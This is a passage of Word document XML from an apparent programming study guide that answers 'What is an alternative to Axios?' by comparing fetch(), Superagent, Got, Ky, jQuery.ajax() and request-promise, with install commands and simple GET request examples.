        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="882" w:name="_Toc196308362"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an alternative to Axios</w:t>
      </w:r>
      <w:r w:rsidR="00EA1B73" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="882"/>
    </w:p>
    <w:p w14:paraId="2C0E3979" w14:textId="02A1DFF5" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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An alternative to Axios for making HTTP requests in JavaScript/React is the native fetch() API, which is built into modern browsers. It provides a simpler and more lightweight approach for making requests, though it may require more manual handling of response parsing and error handling compared to Axios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFA376"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Here are some other popular alternatives to Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEEAACE" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. fetch() API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B5883"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Built-in</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Native to JavaScript, so you don’t need to install any external libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F4B7E"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lastRenderedPageBreak/>
        <w:t>Promise-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns a Promise, making it easy to chain .then() and .catch() for handling responses and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FF991"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No built-in request/response transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike Axios, fetch() does not automatically parse JSON or transform request data, so you’ll need to manually call .json() or .text() on the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35EC84"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Example using fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF70AC"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fetch('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5265D5"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then(response =&gt; response.json()) // Parses JSON response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16194CB6"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then(data =&gt; console.log(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A09BA9"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catch(error =&gt; console.error('Error:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23808F6B" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Superagent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160ABA5D"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User-friendly</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A popular HTTP client with a simple API, useful for making HTTP requests with additional features like file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C47FE"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Supports both callbacks and promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82BCAE"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Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D3E25"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npm install superagent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995F09A"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Example using Superagent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C11A5"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import request from 'superagent';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DCEA5" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6D5266"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request.get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FF17AE"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then(response =&gt; console.log(response.body))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3C352B"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catch(error =&gt; console.error(error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D08CFC" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD7BA2"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Lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A powerful and smaller HTTP request library, mainly used in Node.js but can also be used in the browser with bundling tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CD8C1"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Supports promises</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and comes with built-in retries and caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19545B54"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Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5440589E"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npm install got</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43947A98"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Example using Got</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FE0DA"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import got from 'got';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1D78B" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A46F339"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got('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EED91C6"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then(response =&gt; console.log(response.body))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE1804"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catch(error =&gt; console.error(error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC4F69" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Fetch API with Axios alternatives (e.g., ky, node-fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF2FA8"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Ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A small, modern alternative to Axios that works with fetch() internally. It's simple to use, supports HTTP methods, and has built-in JSON handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC428ED"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Node-fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lightweight implementation of fetch() for Node.js environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236317B1"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Installation for Ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B90A410"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npm install ky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2CD95"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Example using ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5A9D2"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import ky from 'ky';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391084DA" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C57570"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ky.get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37372626"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json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF5F30"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then(data =&gt; console.log(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3970C"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catch(error =&gt; console.error(error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB65C56" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. jQuery.ajax()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280112D4"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If you’re using jQuery, the $.ajax() method provides a simple API for making HTTP requests. While not commonly used in modern React development, it’s still an option for legacy systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C22B6"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Example using jQuery.ajax()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C75D6"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ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1164CB"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url: 'https://api.example.com/data',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35546F40"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type: 'GET',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CCA3D"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success: function (data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E272D6C"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console.log(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500668F8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5CFAE"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error: function (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D1B08"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    console.error(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72CD10"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71319967"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D70646" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Request-Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521856AA"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A wrapper around request</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is deprecated now), used to simplify HTTP requests in Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC18A2F"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Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDED90F"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npm install request-promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939DFD4"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Example using request-promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4C9784"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const request = require('request-promise');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D7215" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EE3BE9"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request('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D40E5"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then(data =&gt; console.log(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F7692"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  .catch(error =&gt; console.error(error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE48FBD" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00000000" w:rsidP="00EC456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BC97EB1">
          <v:rect id="_x0000_i3582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B1131" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F3BE0"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fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Built-in, native JavaScript API; lightweight, but requires more manual handling of responses and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28C742"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Superagent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: User-friendly and provides additional functionality like file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D710260"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Got</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lightweight, supports retries and caching, great for Node.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374D6B9"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Ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modern, small alternative to Axios built around fetch(), with a focus on simplicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E3361"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jQuery.ajax()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for legacy projects but not recommended for modern React apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5BE3F"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Request-Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A simplified wrapper around the request library, but request is deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C03E99" w14:textId="77777777" w:rsidR="00BE25FF" w:rsidRPr="00EC456B" w:rsidRDefault="00BE25FF" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For most modern React apps, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fetch()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ky</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be excellent alternatives to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Axios</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
